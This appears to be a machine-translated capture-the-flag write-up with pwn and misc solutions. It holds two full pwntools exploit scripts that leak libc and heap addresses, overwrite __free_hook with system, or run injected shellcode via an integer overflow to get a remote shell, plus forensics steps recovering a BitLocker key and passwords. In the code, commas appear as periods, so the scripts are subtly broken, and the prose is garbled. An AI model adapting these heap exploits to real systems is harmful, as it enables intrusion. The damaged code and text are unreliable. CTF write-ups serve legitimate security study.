# -*- coding: utf-8 -*-
from pwn import *
pc = './pwdPro'
# p = process(pc)
libc = ELF("./libc.so")
p = remote("47.104.71.220".49261)
context.log_level = 'debug'
context.binary=pc
context.terminal=["gnome-terminal".'-x'.'sh'.'-c']
ru = lambda x : p.recvuntil(x,timeout=0.2)
sn = lambda x : p.send(x)
rl = lambda : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
shell= lambda :p.interactive()
ru7f = lambda : u64(ru('\x7f')[-6:].ljust(8.'\x00'))
rv6 = lambda : u64(rv(6) +'\x00'*2)
def add(idx, id, size, content="a\n") :
sla("Choice:"."1")
sla("Add:".str(idx))
sla("Save:".id)
sla("Of Your Pwd:".str(size))
sa("Your Pwd:", content)
def show(idx) :
sla("Choice:"."3")
sla("".str(idx))
def edit(idx, content) :
sla("Choice:"."2")
sla("Edit:".str(idx))
sn(content)
def dele(idx) :
sla("Choice:"."4")
sla("Delete:".str(idx))
def re(idx) :
sla("Choice:"."5")
sla("Recover:".str(idx))
add(0."a".0x450)
ru("ID:")
rv(8)
key = u64(rv(8))
print(hex(key))
add(1."a".0x420)
dele(0)
re(0)
show(0)
ru("Pwd is: ")
libc.address = (u64(rv(8))^key) - 0x1ebbe0
print(hex(libc.address))
add(0."a".0x450)
add(2."a".0x440)
add(3."a".0x420)
dele(0)
add(4."a".0x600)
dele(2)
re(0)
show(0)
ru("Pwd is: ")
rv(0x10)
heap_addr = u64(rv(8))^key
print(hex(heap_addr))
edit(0, p64(libc.address + 0x1ec010) *2+p64(heap_addr)+p64(libc.address+0x1eb2d8-0x20-4) +'\n')
add(10."a".0x600)
add(11."a".0x800, p64(u64("/bin/sh\x00")^key)+"\n")
dele(10)
edit(0."a"*0xe8+p64(libc.sym['__free_hook']))
add(12."a".0x600, p64(libc.sym['system']^key)+'\n')
dele(11)
shell()
Copy the codeflag{909cf735-b274-4098-885b-589300839b71}
5, the JigSaw ‘sCage
There is an integer overflow/width overflow, you can bypass the check to get a block of RWX heap address:
The test function executes the input assembly code
R10,r12, r10,r12;
add r10, 0x50068
mov r12, r10
sub r10, 0x1496b0
mov qword ptr [r12],r10
Copy the codeexp:
#! usr/bin/env python
#-*- coding:utf8 -*-
from pwn import *
import sys
pc="./JigSAW"
reomote_addr=["47.104.71.220".10273]
elf = ELF(pc)
libc = elf.libc
context.binary=pc
context.terminal=["gnome-terminal".'-x'.'sh'.'-c']
if len(sys.argv)==1:
# p=process(pc)
context.log_level="debug"
p=process(pc,env={"LD_PRELOAD":"./libc.so"})
if len(sys.argv)==2 :
if 'l' in sys.argv[1]:
p=process(pc)
if 'r' in sys.argv[1]:
p = remote(reomote_addr[0],reomote_addr[1])
if 'n' not in sys.argv[1]:
context.log_level="debug"
ru = lambda x : p.recvuntil(x,timeout=0.2)
sn = lambda x : p.send(x)
rl = lambda : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
shell= lambda :p.interactive()
ru7f = lambda : u64(ru('\x7f')[-6:].ljust(8.'\x00'))
rv6 = lambda : u64(rv(6) +'\x00'*2)
def lg(s,addr) :
print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
what_choice="Choice : "
ch_add="1"
ch_dele="3"
ch_edit="2"
ch_show="5"
what_size=""
what_c="iNput:"
what_idx="Index? :"
def add(idx) : 5 # 0 x10
ru(what_choice)
sl(ch_add)
ru(what_idx)
sl(str(idx))
def dele(idx) :
ru(what_choice)
sl(ch_dele)
ru(what_idx)
sl(str(idx))
def edit(idx,c) : #0x10
ru(what_choice)
sl(ch_edit)
ru(what_idx)
sl(str(idx))
ru(what_c)
sn(c) # #
def test(idx) :
ru(what_choice)
sl('4')
ru(what_idx)
sl(str(idx))
def show(idx) :
ru(what_choice)
sl(ch_show)
ru(what_idx)
sl(str(idx))
ru("Name:")
sl('desh')
ru("The result is ")
size = ru('\n')
print(int(size,10))
ru("Make your Choice:")
sl(str(0xffff00000000))
code1 = asm("add r10, 0x50068; mov r12, r10;")
code2 = asm("sub r10, 0x1496b0; mov qword ptr [r12], r10")
add(0)
add(1)
add(2)
edit(0,code1)
edit(1,code2)
edit(2.'/bin/sh\x00')
test(0)
test(1)
dele(2)
shell()
Copy the codeflag{58591d4d-068f-47ed-9305-a65762917b06}
misc
1, layers of evidence
Mount the image and find the key in memory
Bitlocker key 549714-116633-006446-278597-176000-708532-618101-131406
A traffic packet was found. Procedure
Trace UDP, open, save as zip format
Hint on the right is the same as the boot password
Hashdump once
Xiaoming_handsome is the password of the compressed package
Open docX, and there is another layer of password
Search in raw data
Cry chick love
After decompression, get a DOCx, there are a few words, no hidden. Try changing the suffix to zip.
Unzip the zip, key.txt is zero width
The password is Because I like naruto best
Unzip the package, convert 0 and 1, shuttle out the image
from PIL import Image
from Crypto.Util.number import long_to_bytes
import base64
path = "D:\\Desktop\\xiangyuncup\\misc4_\\_rels\\out\\"
flag = "0b"
for i in range(129488):
_path=path+str(i)+".png"
a=Image.open(_path)
if a.size[0] == 23:flag+="0"
else:flag+="1"
cipher=int(flag, 2)
data=long_to_bytes(cipher)
data = str(data).split(',')[1].encode()
image_data = base64.b64decode(data)
with open('1.png', 'wb') as f:
f.write(image_data)
Copy the code
3, ChieftainsSecret
Binwalk can get a table and a chip diagram:
Apparently, we need to analyze the chip’s functionality.
Table with broken line picture, you can find some trigonometric signal, according to the signal should be able to get what information
Let’s do four sets of data
www.bilibili.com/video/av589… How to change the time
x=cos_p-cos_n
y=sin_p-sin_n
Convert to Angle, calculate theta (atan2(x,y)*57.3, negative value plus 360), plot:
The corresponding numbers of peak values are compared one by one, and 77085962457 is obtained.